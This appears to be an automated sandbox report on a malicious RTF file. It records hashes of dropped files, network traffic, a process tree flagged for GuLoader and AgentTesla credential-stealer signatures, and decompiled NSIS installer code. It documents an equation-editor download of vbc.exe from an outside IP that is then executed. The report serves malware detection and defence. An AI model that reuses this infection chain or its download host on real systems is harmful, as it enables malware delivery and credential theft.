                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):62
                                                                          Entropy (8bit):4.092532149055232
                                                                          Encrypted:false
                                                                          SSDEEP:3:vpqMLJUQ2udSLCsKfOW2I/n:vEMWXS8Csq2+
                                                                          MD5:4627BA4A1F33E5418EBE1537A38D5993
                                                                          SHA1:DA04BE94C45C85115B543C742C2037374E89C30D
                                                                          SHA-256:DB56B1FCD113AC79ECE19BAA1D68DDED7341C419B2498250218F3A5C6783BC70
                                                                          SHA-512:C0DEAB6D1863A717C852FDF72E31F59A1D6B60C7A9443FF6C74CBD59E13AC3898751343556784A8218FFF5CE9E72581F291A32E93BB5E1CD24BFE78ECF8CB65A
                                                                          Malicious:false
                                                                          Preview: wla42..live.com/.1536.788723328.30927982.300770641.30926650.*.
                                                                          C:\Users\user\AppData\Roaming\misv.exe
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):135018
                                                                          Entropy (8bit):7.060957913639306
                                                                          Encrypted:false
                                                                          SSDEEP:3072:gbG7N2kDTHUpou4ubvh1q2SRdteVQNOqeOEgyVlzba:gbE/HUjva2udnNOqbByVlPa
                                                                          MD5:1DA682EC8DCBC375B6E76660EF46D3FD
                                                                          SHA1:B7DA4D771226B5A4F045B0D8A263451612EE3303
                                                                          SHA-256:6D624544826CC99182030BB50757944FEE3734EA01E8C37A77A22214BFF4B9DF
                                                                          SHA-512:2077475610EAA19020D7AFA36896B3E995D66651F4D0E8B4EB8523D64EA8C4B5C48778081182C033FD3C330A253EF8FA34E935BAD4EF7947CD17EE09B126AA4F
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse
                                                                          • Filename: sKxsGhU1Wg.exe, Detection: malicious, Browse
                                                                          C:\Users\user\Desktop\~$1Ip9NCGi.rtf
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                          C:\Users\Public\vbc.exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):131595
                                                                          Entropy (8bit):7.073841941088541
                                                                          Encrypted:false
                                                                          SSDEEP:3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
                                                                          MD5:99BDB5995C8DD619A3EC2B799D1CF868
                                                                          SHA1:7EB9E30BA8572F07A1E88972AD8F14954E84EB39
                                                                          SHA-256:C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
                                                                          SHA-512:8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 20%
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse

                                                                          Static File Info

                                                                          General

                                                                          File type:Rich Text Format data, unknown version
                                                                          Entropy (8bit):3.8961893755654535
                                                                          TrID:
                                                                          • Rich Text Format (5005/1) 55.56%
                                                                          • Rich Text Format (4004/1) 44.44%
                                                                          File name:T81Ip9NCGi.rtf
                                                                          File size:18403
                                                                          MD5:79b064007e51e1cfb2f7c91c732242a9
                                                                          SHA1:c4748fd11683b4b02e5bbc13746005a023f66568
                                                                          SHA256:b5784dc5717d0733bcdd150fda07cc94bcc2e2529e0f03e3bb9ec9b623302496
                                                                          SHA512:ae4601607f1ab7cd49cf1bd3f99b814936cdaa1fbd0d4c48194e914c843ad35720a9aa3d0ea7a8c236247d0c166188c4fdc6b17be7da560827eb471ab01b100b
                                                                          SSDEEP:384:B8TOyxGioDT31T1cn2UXNaMoPjhaeFkfylzc:B8TjxmDT3CFNShpFUMc
                                                                          File Content Preview:{\rtf79583|!`=_-^;.<?*?^?!^!%.%_.?57#~:7@9:[:6~?%@.<.2_=!!!4,9??]%?%][+_39*9~&%3=?0#42>>|;~1)@;54@?)/?,?7;5?%?677).^9_?|934~|,&28_5?3/2+4.%%0?`^(3]?%~).12!/#*~%?.]|.>+7-_-@@2?*<&)>@;:]>$?[.?_!|&%=8<&2`4%!_*~.~8'%+%1>?%].'.*7$'4.|',9~'=7!!47./??;9:,:#?%.<[

                                                                          File Icon

                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                          Static RTF Info

                                                                          Objects

                                                                          Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                                          0 | 000005F3h | | | | | | | | no
                                                                          1 | 000005C3h | | | | | | | | no

                                                                          Network Behavior

                                                                          TCP Packets

                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Dec 1, 2021 20:57:58.617099047 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617106915 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617120028 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617137909 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617141962 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617160082 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617176056 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619049072 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.619079113 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.619085073 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619105101 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.619124889 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619163990 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619832039 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621081114 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.621131897 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.621141911 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621159077 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.621182919 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621198893 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621738911 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:59.543869972 CET4916580192.168.2.22192.3.122.180

                                                                          UDP Packets

                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Dec 1, 2021 20:59:55.853311062 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                                                          Dec 1, 2021 20:59:57.084176064 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                                                          Dec 1, 2021 21:00:02.072386026 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8

                                                                          DNS Queries

                                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                          Dec 1, 2021 20:59:55.853311062 CET | 192.168.2.22 | 8.8.8.8 | 0x6471 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                                                          Dec 1, 2021 20:59:57.084176064 CET | 192.168.2.22 | 8.8.8.8 | 0x6897 | Standard query (0) | eruitg.bl.files.1drv.com | A (IP address) | IN (0x0001)
                                                                          Dec 1, 2021 21:00:02.072386026 CET | 192.168.2.22 | 8.8.8.8 | 0x9122 | Standard query (0) | fspzka.bl.files.1drv.com | A (IP address) | IN (0x0001)

                                                                          DNS Answers

                                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                          Dec 1, 2021 20:59:55.888254881 CET | 8.8.8.8 | 192.168.2.22 | 0x6471 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                                                          Dec 1, 2021 20:59:57.183187008 CET | 8.8.8.8 | 192.168.2.22 | 0x6897 | No error (0) | eruitg.bl.files.1drv.com | bl-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                                                          Dec 1, 2021 20:59:57.183187008 CET | 8.8.8.8 | 192.168.2.22 | 0x6897 | No error (0) | bl-files.fe.1drv.com | odc-bl-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                                                          Dec 1, 2021 21:00:02.143680096 CET | 8.8.8.8 | 192.168.2.22 | 0x9122 | No error (0) | fspzka.bl.files.1drv.com | bl-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                                                          Dec 1, 2021 21:00:02.143680096 CET | 8.8.8.8 | 192.168.2.22 | 0x9122 | No error (0) | bl-files.fe.1drv.com | odc-bl-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • 192.3.122.180

                                                                          HTTP Packets

                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          0 | 192.168.2.22 | 49165 | 192.3.122.180 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Dec 1, 2021 20:57:58.035166025 CET | 0 | OUT | GET /1100/vbc.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: 192.3.122.180
                                                                          Connection: Keep-Alive
                                                                          Dec 1, 2021 20:57:58.153230906 CET | 1 | IN | HTTP/1.1 200 OK
                                                                          Date: Wed, 01 Dec 2021 19:57:58 GMT
                                                                          Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                                                          Last-Modified: Wed, 01 Dec 2021 09:20:35 GMT
                                                                          ETag: "2020b-5d2122fb5045c"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 131595
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-msdownload


                                                                          System Behavior

                                                                          General

                                                                          Start time:20:57:16
                                                                          Start date:01/12/2021
                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                          Imagebase:0x13f860000
                                                                          File size:1423704 bytes
                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:20:57:18
                                                                          Start date:01/12/2021
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:20:57:20
                                                                          Start date:01/12/2021
                                                                          Path:C:\Users\Public\vbc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\Public\vbc.exe"
                                                                          Imagebase:0x400000
                                                                          File size:131595 bytes
                                                                          MD5 hash:99BDB5995C8DD619A3EC2B799D1CF868
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 20%, ReversingLabs
                                                                          Reputation:low

                                                                          General

                                                                          Start time:20:57:23
                                                                          Start date:01/12/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0x400000
                                                                          File size:21304624 bytes
                                                                          MD5 hash:E32061DA9B34B82E0AB5D0E53CAF5A09
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Visual Basic
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          General

                                                                          Start time:20:58:28
                                                                          Start date:01/12/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0xda0000
                                                                          File size:107680 bytes
                                                                          MD5 hash:10FE5178DFC39E15AFE7FED83C7A3B44
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low

                                                                          General

                                                                          Start time:20:58:29
                                                                          Start date:01/12/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0xda0000
                                                                          File size:107680 bytes
                                                                          MD5 hash:10FE5178DFC39E15AFE7FED83C7A3B44
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low

                                                                          General

                                                                          Start time:20:58:29
                                                                          Start date:01/12/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0xda0000
                                                                          File size:107680 bytes
                                                                          MD5 hash:10FE5178DFC39E15AFE7FED83C7A3B44
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          General

                                                                          Start time:20:59:21
                                                                          Start date:01/12/2021
                                                                          Path:C:\Users\user\AppData\Roaming\misv.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\misv.exe"
                                                                          Imagebase:0x400000
                                                                          File size:135018 bytes
                                                                          MD5 hash:1DA682EC8DCBC375B6E76660EF46D3FD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low

                                                                          Disassembly

                                                                          Code Analysis

                                                                            Executed Functions

                                                                            C-Code - Quality: 78%
                                                                            			_entry_() {
                                                                            				WCHAR* _v8;
                                                                            				signed int _v12;
                                                                            				void* _v16;
                                                                            				signed int _v20;
                                                                            				int _v24;
                                                                            				int _v28;
                                                                            				struct _TOKEN_PRIVILEGES _v40;
                                                                            				signed char _v42;
                                                                            				int _v44;
                                                                            				signed int _v48;
                                                                            				intOrPtr _v278;
                                                                            				signed short _v310;
                                                                            				struct _OSVERSIONINFOW _v324;
                                                                            				struct _SHFILEINFOW _v1016;
                                                                            				intOrPtr* _t88;
                                                                            				intOrPtr* _t94;
                                                                            				void _t97;
                                                                            				void* _t116;
                                                                            				WCHAR* _t118;
                                                                            				signed int _t119;
                                                                            				intOrPtr* _t123;
                                                                            				void* _t137;
                                                                            				void* _t143;
                                                                            				void* _t148;
                                                                            				void* _t152;
                                                                            				void* _t157;
                                                                            				signed int _t167;
                                                                            				void* _t170;
                                                                            				void* _t175;
                                                                            				intOrPtr _t177;
                                                                            				intOrPtr _t178;
                                                                            				intOrPtr* _t179;
                                                                            				int _t188;
                                                                            				void* _t189;
                                                                            				void* _t198;
                                                                            				signed int _t204;
                                                                            				signed int _t209;
                                                                            				signed int _t214;
                                                                            				int* _t218;
                                                                            				signed int _t226;
                                                                            				signed int _t229;
                                                                            				CHAR* _t231;
                                                                            				signed int _t233;
                                                                            				WCHAR* _t234;
                                                                            
                                                                            				0x440000 = 0x20;
                                                                            				_t188 = 0;
                                                                            				_v24 = 0;
                                                                            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                            				_v20 = 0;
                                                                            				SetErrorMode(0x8001); // executed
                                                                            				_v324.szCSDVersion = 0;
                                                                            				_v48 = 0;
                                                                            				_v44 = 0;
                                                                            				_v324.dwOSVersionInfoSize = 0x11c;
                                                                            				if(GetVersionExW( &_v324) == 0) {
                                                                            					_v324.dwOSVersionInfoSize = 0x114;
                                                                            					GetVersionExW( &_v324);
                                                                            					asm("sbb eax, eax");
                                                                            					_v42 = 4;
                                                                            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                            				}
                                                                            				if(_v324.dwMajorVersion < 0xa) {
                                                                            					_v310 = _v310 & 0x00000000;
                                                                            				}
                                                                            				 *0x434fb8 = _v324.dwBuildNumber;
                                                                            				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                            				if( *0x434fbe != 0x600) {
                                                                            					_t179 = E0040690A(_t188);
                                                                            					if(_t179 != _t188) {
                                                                            						 *_t179(0xc00);
                                                                            					}
                                                                            				}
                                                                            				_t231 = "UXTHEME";
                                                                            				do {
                                                                            					E0040689A(_t231); // executed
                                                                            					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                                            				} while ( *_t231 != 0);
                                                                            				E0040690A(0xb);
                                                                            				 *0x434f04 = E0040690A(9);
                                                                            				_t88 = E0040690A(7);
                                                                            				if(_t88 != _t188) {
                                                                            					_t88 =  *_t88(0x1e);
                                                                            					if(_t88 != 0) {
                                                                            						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                                            					}
                                                                            				}
                                                                            				__imp__#17();
                                                                            				__imp__OleInitialize(_t188); // executed
                                                                            				 *0x434fc0 = _t88;
                                                                            				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                                            				E0040653D(0x433f00, L"NSIS Error");
                                                                            				E0040653D(0x440000, GetCommandLineW());
                                                                            				_t94 = 0x440000;
                                                                            				_t233 = 0x22;
                                                                            				 *0x434f00 = 0x400000;
                                                                            				if( *0x440000 == _t233) {
                                                                            					_t94 = 0x440002;
                                                                            				}
                                                                            				_t198 = CharNextW(E00405E39(_t94, 0x440000));
                                                                            				_v16 = _t198;
                                                                            				while(1) {
                                                                            					_t97 =  *_t198;
                                                                            					_t251 = _t97 - _t188;
                                                                            					if(_t97 == _t188) {
                                                                            						break;
                                                                            					}
                                                                            					_t209 = 0x20;
                                                                            					__eflags = _t97 - _t209;
                                                                            					if(_t97 != _t209) {
                                                                            						L17:
                                                                            						__eflags =  *_t198 - _t233;
                                                                            						_v12 = _t209;
                                                                            						if( *_t198 == _t233) {
                                                                            							_v12 = _t233;
                                                                            							_t198 = _t198 + 2;
                                                                            							__eflags = _t198;
                                                                            						}
                                                                            						__eflags =  *_t198 - 0x2f;
                                                                            						if( *_t198 != 0x2f) {
                                                                            							L32:
                                                                            							_t198 = E00405E39(_t198, _v12);
                                                                            							__eflags =  *_t198 - _t233;
                                                                            							if(__eflags == 0) {
                                                                            								_t198 = _t198 + 2;
                                                                            								__eflags = _t198;
                                                                            							}
                                                                            							continue;
                                                                            						} else {
                                                                            							_t198 = _t198 + 2;
                                                                            							__eflags =  *_t198 - 0x53;
                                                                            							if( *_t198 != 0x53) {
                                                                            								L24:
                                                                            								asm("cdq");
                                                                            								asm("cdq");
                                                                            								_t214 = L"NCRC" & 0x0000ffff;
                                                                            								asm("cdq");
                                                                            								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
                                                                            								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
                                                                            								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
                                                                            									L29:
                                                                            									asm("cdq");
                                                                            									asm("cdq");
                                                                            									_t209 = L" /D=" & 0x0000ffff;
                                                                            									asm("cdq");
                                                                            									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
                                                                            									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
                                                                            									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
                                                                            										L31:
                                                                            										_t233 = 0x22;
                                                                            										goto L32;
                                                                            									}
                                                                            									__eflags =  *_t198 - _t229;
                                                                            									if( *_t198 == _t229) {
                                                                            										 *(_t198 - 4) = _t188;
                                                                            										__eflags = _t198;
                                                                            										E0040653D(0x440800, _t198);
                                                                            										L37:
                                                                            										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                                            										GetTempPathW(0x400, _t234);
                                                                            										_t116 = E004034FC(_t198, _t251);
                                                                            										_t252 = _t116;
                                                                            										if(_t116 != 0) {
                                                                            											L40:
                                                                            											DeleteFileW(L"1033"); // executed
                                                                            											_t118 = E0040307D(_t254, _v20); // executed
                                                                            											_v8 = _t118;
                                                                            											if(_t118 != _t188) {
                                                                            												L68:
                                                                            												ExitProcess(); // executed
                                                                            												__imp__OleUninitialize(); // executed
                                                                            												if(_v8 == _t188) {
                                                                            													if( *0x434f94 == _t188) {
                                                                            														L77:
                                                                            														_t119 =  *0x434fac;
                                                                            														if(_t119 != 0xffffffff) {
                                                                            															_v24 = _t119;
                                                                            														}
                                                                            														ExitProcess(_v24);
                                                                            													}
                                                                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                            														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                            														_v40.PrivilegeCount = 1;
                                                                            														_v28 = 2;
                                                                            														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                                            													}
                                                                            													_t123 = E0040690A(4);
                                                                            													if(_t123 == _t188) {
                                                                            														L75:
                                                                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                            															goto L77;
                                                                            														}
                                                                            														goto L76;
                                                                            													} else {
                                                                            														_push(0x80040002);
                                                                            														_push(0x25);
                                                                            														_push(_t188);
                                                                            														_push(_t188);
                                                                            														_push(_t188);
                                                                            														if( *_t123() == 0) {
                                                                            															L76:
                                                                            															E0040140B(9);
                                                                            															goto L77;
                                                                            														}
                                                                            														goto L75;
                                                                            													}
                                                                            												}
                                                                            												E00405B9D(_v8, 0x200010);
                                                                            												ExitProcess(2);
                                                                            											}
                                                                            											if( *0x434f1c == _t188) {
                                                                            												L51:
                                                                            												 *0x434fac =  *0x434fac | 0xffffffff;
                                                                            												_v24 = E00403BEC(_t264);
                                                                            												goto L68;
                                                                            											}
                                                                            											_t218 = E00405E39(0x440000, _t188);
                                                                            											if(_t218 < 0x440000) {
                                                                            												L48:
                                                                            												_t263 = _t218 - 0x440000;
                                                                            												_v8 = L"Error launching installer";
                                                                            												if(_t218 < 0x440000) {
                                                                            													_t189 = E00405B08(__eflags);
                                                                            													lstrcatW(_t234, L"~nsu");
                                                                            													__eflags = _t189;
                                                                            													if(_t189 != 0) {
                                                                            														lstrcatW(_t234, "A");
                                                                            													}
                                                                            													lstrcatW(_t234, L".tmp");
                                                                            													_t137 = lstrcmpiW(_t234, 0x441800);
                                                                            													__eflags = _t137;
                                                                            													if(_t137 == 0) {
                                                                            														L67:
                                                                            														_t188 = 0;
                                                                            														__eflags = 0;
                                                                            														goto L68;
                                                                            													} else {
                                                                            														__eflags = _t189;
                                                                            														_push(_t234);
                                                                            														if(_t189 == 0) {
                                                                            															E00405AEB();
                                                                            														} else {
                                                                            															E00405A6E();
                                                                            														}
                                                                            														SetCurrentDirectoryW(_t234);
                                                                            														__eflags =  *0x440800;
                                                                            														if( *0x440800 == 0) {
                                                                            															E0040653D(0x440800, 0x441800);
                                                                            														}
                                                                            														E0040653D(0x436000, _v16);
                                                                            														_t201 = "A" & 0x0000ffff;
                                                                            														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                            														__eflags = _t143;
                                                                            														_v12 = 0x1a;
                                                                            														 *0x436800 = _t143;
                                                                            														do {
                                                                            															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                                            															DeleteFileW(0x42aa28);
                                                                            															__eflags = _v8;
                                                                            															if(_v8 != 0) {
                                                                            																_t148 = CopyFileW(0x443800, 0x42aa28, 1);
                                                                            																__eflags = _t148;
                                                                            																if(_t148 != 0) {
                                                                            																	E004062FD(_t201, 0x42aa28, 0);
                                                                            																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                                            																	_t152 = E00405B20(0x42aa28);
                                                                            																	__eflags = _t152;
                                                                            																	if(_t152 != 0) {
                                                                            																		CloseHandle(_t152);
                                                                            																		_v8 = 0;
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            															 *0x436800 =  *0x436800 + 1;
                                                                            															_t61 =  &_v12;
                                                                            															 *_t61 = _v12 - 1;
                                                                            															__eflags =  *_t61;
                                                                            														} while ( *_t61 != 0);
                                                                            														E004062FD(_t201, _t234, 0);
                                                                            														goto L67;
                                                                            													}
                                                                            												}
                                                                            												 *_t218 = _t188;
                                                                            												_t221 =  &(_t218[2]);
                                                                            												_t157 = E00405F14(_t263,  &(_t218[2]));
                                                                            												_t264 = _t157;
                                                                            												if(_t157 == 0) {
                                                                            													goto L68;
                                                                            												}
                                                                            												E0040653D(0x440800, _t221);
                                                                            												E0040653D(0x441000, _t221);
                                                                            												_v8 = _t188;
                                                                            												goto L51;
                                                                            											}
                                                                            											asm("cdq");
                                                                            											asm("cdq");
                                                                            											asm("cdq");
                                                                            											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                            											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                            											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                                            												_t218 = _t218;
                                                                            												if(_t218 >= 0x440000) {
                                                                            													continue;
                                                                            												}
                                                                            												break;
                                                                            											}
                                                                            											_t188 = 0;
                                                                            											goto L48;
                                                                            										}
                                                                            										GetWindowsDirectoryW(_t234, 0x3fb);
                                                                            										lstrcatW(_t234, L"\\Temp");
                                                                            										_t170 = E004034FC(_t198, _t252);
                                                                            										_t253 = _t170;
                                                                            										if(_t170 != 0) {
                                                                            											goto L40;
                                                                            										}
                                                                            										GetTempPathW(0x3fc, _t234);
                                                                            										lstrcatW(_t234, L"Low");
                                                                            										SetEnvironmentVariableW(L"TEMP", _t234);
                                                                            										SetEnvironmentVariableW(L"TMP", _t234);
                                                                            										_t175 = E004034FC(_t198, _t253);
                                                                            										_t254 = _t175;
